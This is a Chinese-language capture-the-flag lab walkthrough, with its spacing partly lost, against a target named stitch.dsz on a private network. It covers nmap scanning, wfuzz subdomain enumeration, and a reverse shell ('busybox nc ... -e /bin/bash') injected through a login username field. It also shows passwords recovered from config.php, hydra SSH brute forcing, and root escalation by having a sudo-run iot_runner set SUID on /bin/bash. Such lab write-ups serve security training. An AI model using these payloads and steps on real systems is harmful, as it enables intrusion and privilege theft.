正文1、端口扫描2、域名重定向3、NC反弹4、文件查找5、iiiii用户登录6、/HOME下多用户筛选7、多用户爆破8、iot_runner程序漏洞利用正文kali攻击机地址192.168.1.4靶场地址192.168.1.191、端口扫描在kali里使用nmap工具nmap-sV-v-T4-A192.168.1.1922和80端口是开放的。进入网页发现域名stitch.dsz2、域名重定向修改kali中hosts:vi/etc/hosts进入hosts文件里添加192.168.1.19 stitch.dsz:wq!退出重新访问http://stitch.dsz发现域名重定向了使用子域名扫描工具wfuzz-w/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt-ustitch.dsz-HHost:FUZZ.stitch.dsz--hw1348扫出来3个子域名http://mail.stitch.dsz、http://dog.stitch.dsz、http://iot.stitch.dsz:重新编辑kali里面的/etc/hosts文件192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz顺便修改windows下的Hosts文件C:\Windows\System32\drivers\etc\hosts3、NC反弹登录http://iot.stitch.dsz/,爆破用户名和密码的时候可以对用户名构造nc连接语句;busyboxnc192.168.1.44444-e/bin/bash;调整格式/usr/bin/script-qc/bin/bash /dev/null CTRLZ stty raw -echo;fgreset xtermcd..find./4、文件查找在/www目录下有个./dog/config.php文件可以发现里面存了一堆密码3c4900896d92da 3c4900896d92da789abc s3cur3Pssw0rd5、iiiii用户登录先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户su- iiiii6、/HOME下多用户筛选筛选/home目录下的所有用户#写法1ls-al|awk{print $NF}#写法2输出结果跳过前三行ls-al|awk NR3 {print $NF}7、多用户爆破hydra-Lusr.txt-Ppass1.txt ssh://192.168.1.19-I-enrs切换iotuser用户后发现可以执行iot_runner的脚本8、iot_runner程序漏洞利用在iotuser用户下操作cd/tmpvia.sh IOT#chmods /bin/bashchmod600/tmp/a.sh在iiiii用户下操作sudo/usr/bin/push_iot /tmp/a.sh在iotuser用户下操作sudo/usr/bin/iot_runner a.shbash-p大致意思解释 (1在iotuser下创建恶意脚本cd/tmp# 进入临时目录所有人可写via.sh# 创建脚本 a.sh脚本内容最关键chmod s /bin/bashchmod s给文件设置SUID 权限/bin/bash系统的 bash 命令行工具效果让/bin/bash变成任何人运行都直接获得 root 权限2设置脚本权限chmod600/tmp/a.sh让脚本只能被iotuser读写避免被其他用户修改或删除(3在iiiii用户下把脚本推给 iot_runnersudo/usr/bin/push_iot /tmp/a.sh作用将/tmp/a.sh放到iot_runner可以执行的位置让后面的iot_runner能找到并运行它 4回到iotuser以 root 权限执行恶意脚本sudo/usr/bin/iot_runner a.shiot_runner是root 权限运行它执行了你的a.sha.sh执行chmods /bin/bash结果/bin/bash 获得了 SUID root 权限5最终拿到 root 权限bash-p-p是什么保留SUID 权限不降级权限直接以root身份打开 shell执行完这一句你就已经从普通用户 → 变成 root了